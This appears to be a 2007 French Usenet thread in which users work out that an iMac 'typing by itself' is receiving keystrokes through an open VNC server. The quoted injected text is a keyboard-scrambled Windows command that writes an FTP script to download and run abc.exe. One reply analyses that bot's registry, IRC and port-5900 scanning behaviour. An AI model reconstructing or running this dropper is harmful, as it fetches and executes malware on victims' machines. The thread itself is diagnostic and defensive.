en mode traitement de texte (neo office ou textedit), l'ordinateur de
mon épouse (iMac G4 15" macOSX 10.4.8) se met parfois à écrire tout
seul.
ça commence généralement comme ça :
(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
j'ai éteint Airport, débranché le réseau, ça continue...
il me semble reconnaitre des bouts de langage structuré, mais je ne vois
pas d'où ça peut venir.
elle n'a ni word ni Excel, mais plein de copines qui lui envoient toutes
les m... possibles.
Ma seule piste est que depuis quelques temps, son disque de démarrage
était saturé de chez saturé, il est meme descendu à 1,6 MO de libre
(depuis, on a nettoyé)
On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:
(syste,root(`syste,"é`c,d:exe c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v )smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus :-) Arrête ton serveur VNC. -- Nina
On Tue, 27 Mar 2007 00:05:34 +0200, pmanet@invivo.edu (manet) wrote:
(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus
:-)
Arrête ton serveur VNC.
--
Nina
On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:
(syste,root(`syste,"é`c,d:exe c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v )smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus :-) Arrête ton serveur VNC. -- Nina
patpro ~ patrick proniewski
In article , Nina Popravka wrote:
On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:
(syste,root(`syste,"é`c,d:exe c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v )smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus :-) Arrête ton serveur VNC.
si ca apparaît même avec le réseau éteint c'est surement un message de l'au-delà. Peut être un sys-admin dont le meurtre n'a jamais été élucidé et qui revient te hanter ! :)
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
patpro
-- http://www.patpro.net/
In article <f0hg03t0o76of0qtambgcbapcr6mvend4i@4ax.com>,
Nina Popravka <Nina@nospam> wrote:
On Tue, 27 Mar 2007 00:05:34 +0200, pmanet@invivo.edu (manet) wrote:
(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus
:-)
Arrête ton serveur VNC.
si ca apparaît même avec le réseau éteint c'est surement un message de
l'au-delà. Peut être un sys-admin dont le meurtre n'a jamais été élucidé
et qui revient te hanter ! :)
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
On Tue, 27 Mar 2007 00:05:34 +0200, (manet) wrote:
(syste,root(`syste,"é`c,d:exe c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v )smik èdel ik èqbc:exe èexit
del ij èuz:exe ènet stqrt shqredqccess èexit
Mouahhhhhhhhhhhhh je sens que je viens de trouver un autre nid à virus :-) Arrête ton serveur VNC.
si ca apparaît même avec le réseau éteint c'est surement un message de l'au-delà. Peut être un sys-admin dont le meurtre n'a jamais été élucidé et qui revient te hanter ! :)
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
patpro
-- http://www.patpro.net/
Nina Popravka
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski wrote:
si ca apparaît même avec le réseau éteint Je t'accorde que c'est troublant...
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage kssssss... aucune curiosité ;->
-- Nina
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski
<patpro@boleskine.patpro.net> wrote:
si ca apparaît même avec le réseau éteint
Je t'accorde que c'est troublant...
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
kssssss... aucune curiosité ;->
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski wrote:
si ca apparaît même avec le réseau éteint Je t'accorde que c'est troublant...
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage kssssss... aucune curiosité ;->
j'ai la curiosité préemptive : ce genre de gag est bloqué par mon firewall, et/ou mes réflexes d'admin ;)
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace, lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet (et non pas le réseau).
patpro
-- http://www.patpro.net/
In article <dpfh031g4aegq4bga632nlngd9v9pgiac7@4ax.com>,
Nina Popravka <Nina@nospam> wrote:
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski
<patpro@boleskine.patpro.net> wrote:
si ca apparaît même avec le réseau éteint
Je t'accorde que c'est troublant...
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage
kssssss... aucune curiosité ;->
j'ai la curiosité préemptive : ce genre de gag est bloqué par mon
firewall, et/ou mes réflexes d'admin ;)
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le
formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace,
lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet
(et non pas le réseau).
On Tue, 27 Mar 2007 06:52:50 +0100, patpro ~ patrick proniewski wrote:
si ca apparaît même avec le réseau éteint Je t'accorde que c'est troublant...
bon ben sinon c'est balèse, franchement, si ça m'arrivait : formatage kssssss... aucune curiosité ;->
j'ai la curiosité préemptive : ce genre de gag est bloqué par mon firewall, et/ou mes réflexes d'admin ;)
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace, lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet (et non pas le réseau).
patpro
-- http://www.patpro.net/
Nina Popravka
On Tue, 27 Mar 2007 09:27:30 +0200, patpro ~ Patrick Proniewski wrote:
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace, lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet (et non pas le réseau).
A part ça, le abc.exe est le même que celui qui était sur le ftp de l'alien de Riguard, je viens de vérifier les empreintes MD5. Celui la, je l'avais testé. Il inscrit 3 clés de registre (une pour démarrer, et 2 exceptions de firewall spécialement pour lui), va s'inscrire sur un merdier IRC, y prend ses ordres, et commence à scanner les plages qu'on lui a dit, direction port 5900. Il a même la gentillesse de démarrer le firewall de xp (net start sharedaccess) Tout ça nous dit pas par quel phénomène surréaliste il apparaît sur une machine non connectée. Ni d'ailleurs comment les commandes apparaissent dans un traitement de texte. -- Nina
On Tue, 27 Mar 2007 09:27:30 +0200, patpro ~ Patrick Proniewski
<patpro@boleskine.patpro.net> wrote:
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le
formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace,
lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet
(et non pas le réseau).
A part ça, le abc.exe est le même que celui qui était sur le ftp de
l'alien de Riguard, je viens de vérifier les empreintes MD5.
Celui la, je l'avais testé.
Il inscrit 3 clés de registre (une pour démarrer, et 2 exceptions de
firewall spécialement pour lui), va s'inscrire sur un merdier IRC, y
prend ses ordres, et commence à scanner les plages qu'on lui a dit,
direction port 5900.
Il a même la gentillesse de démarrer le firewall de xp (net start
sharedaccess)
Tout ça nous dit pas par quel phénomène surréaliste il apparaît sur
une machine non connectée. Ni d'ailleurs comment les commandes
apparaissent dans un traitement de texte.
--
Nina
On Tue, 27 Mar 2007 09:27:30 +0200, patpro ~ Patrick Proniewski wrote:
Sinon c'est sûr que j'aurai vite fait de déballer l'arsenal avant le formatage. Un peu de forensic fait jamais de mal (lsof, netstat, ktrace, lecture des logs, ...) mais rien avant d'avoir coupé l'accès internet (et non pas le réseau).
A part ça, le abc.exe est le même que celui qui était sur le ftp de l'alien de Riguard, je viens de vérifier les empreintes MD5. Celui la, je l'avais testé. Il inscrit 3 clés de registre (une pour démarrer, et 2 exceptions de firewall spécialement pour lui), va s'inscrire sur un merdier IRC, y prend ses ordres, et commence à scanner les plages qu'on lui a dit, direction port 5900. Il a même la gentillesse de démarrer le firewall de xp (net start sharedaccess) Tout ça nous dit pas par quel phénomène surréaliste il apparaît sur une machine non connectée. Ni d'ailleurs comment les commandes apparaissent dans un traitement de texte. -- Nina
tagada
manet wrote:
des idées ?
Faut vite mettre un mot de passe à ton VNC ! il est ouvert à tous les vents !!!
Patrick
manet <pmanet@invivo.edu> wrote:
des idées ?
Faut vite mettre un mot de passe à ton VNC ! il est ouvert à tous les
vents !!!